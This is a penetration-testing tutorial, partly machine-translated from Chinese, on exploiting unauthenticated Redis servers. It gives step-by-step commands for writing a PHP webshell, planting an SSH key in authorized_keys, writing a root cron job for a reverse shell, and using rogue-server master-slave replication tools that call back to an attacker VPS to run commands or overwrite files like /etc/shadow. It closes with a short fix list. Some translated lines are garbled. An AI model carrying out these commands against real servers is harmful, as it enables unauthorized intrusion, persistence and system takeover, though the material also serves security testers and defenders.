Redis 在渗透测试中常见的利用方式

This article mainly uses the premise that redis is not authorized or known redis password for vulnerability

1 写入 webshell

Conditions:

Known web directory absolute path

Have writable permissions in this directory

View all keys, create new keys, the key value is webshell, here is a demonstration by writing to phpinfo.

Because creating a new key to assign a key will overwrite the original key value, you need to view all keys when assigning, and then select a key that does not exist to create the assignment.

1

2

3

keys *

set x '\n\n?php pnpinfo();\n'

get x

Check the redis database configuration information, because when we write Webshell, we will modify dir and dbfilename, so we mainly record the original value when we check the configuration information here, and fortunately, we will modify it after writing.

1

config get *

Set the webshell output directory and file name, and then write to the Webshell.

1

2

3

config set dir /var/www # Set file writing directory

config set dbfilename 1.php # Set the write file name

save # Save

Finally, restore the database configuration.

2 写入 ssh 公钥

Conditions:

Users who are known to start the service

Have a .ssh directory

Allow login using key authentication

2.1 生成公私钥对

1

ssh-keygen -t rsa # Generate public and private keys

2.2 利用 redis config 写文件

1

2

3

4

set x '\n\nPublic key content\n'

config set dir /home/user/.ssh

config set dbfilename authorized_keys

save

2.3 利用公私钥对登录

1

ssh -i id_rsa user@ip

3 写定时任务反弹 shell

Conditions:

Have permission to write scheduled task directory

Target Start Planning Service

1

2

3

4

5

6

7

keys * View all keys

set x '\n\nSchedule task content\n\n'

config get *

config set dir /var/spool/cron

config set dbfilename root

save Save, complete file writing

del x delete the created x key

4 主从复制

4.1 加载扩展模块执行系统命令

The specific principles have been explained in previous articles on reproducing vulnerabilities.

Script address: https://github.com/Dliv3/redis-rogue-server

Active connection mode:

Parameter description

--rpasswd If the target Redis service has enabled authentication, you can specify a password through this option

--rhost Target Redis Service IP

--rport target redis service port, default is 6379

--lhost vps' external network IP address

--lport vps monitored port, default is 21000

1

python3 redis-rogue-server.py --rhost target address --rport target port --lhost vps address --lport vps port

Passive connection mode:

Applicable to situations where the target Redis service is in the intranet

Attack Redis via SSRF

Intranet Redis Unauthorized access/known Redis password, Redis requires a reverse connection to redis rogue server

1

python3 redis-rogue-server.py --server-only

4.2 主从复制写入纯净文件

Under Linux, SYNC master-slave synchronization can be used to directly write impurities-free files. The script is as follows:

https://github.com/r35tart/RedisWriteFile

This script writes lossless files through Redis master and slave, and can be used to write lossless binary files such as EXE, DLL, LNK and SO under Linux on Windows platform.

You can also override /etc/shadow in Linux without impurities

1

python3 RedisWriteFile.py --rhost 172.17.0.2 --rport 6379 --lhost 172.17.0.1 --lport 4444 --rpath '/var/www' --rfile 'test.php' --lfile './phpinfo.php'

The above method is mainly aimed at Linux. When the web service is not enabled on Windows, how to getshell?

The following is a common way to play redis under windows:

System DLL hijacking (Target restart or logout)

DLL hijacking for specific software (a single click on the target)

Shortcut to overwrite the target (the target is clicked at one click)

Overwrite the configuration files of a specific software to achieve the purpose of raising rights (the goal does not require a click or a single click)

Overwrite files such as sethc.exe (triggered by one by one by the attacker)

Reference: http://r3start.net/index.php/2020/05/25/717

5 漏洞修复

Set password authentication

Try to run Redis services with low permissions

Restrict login IP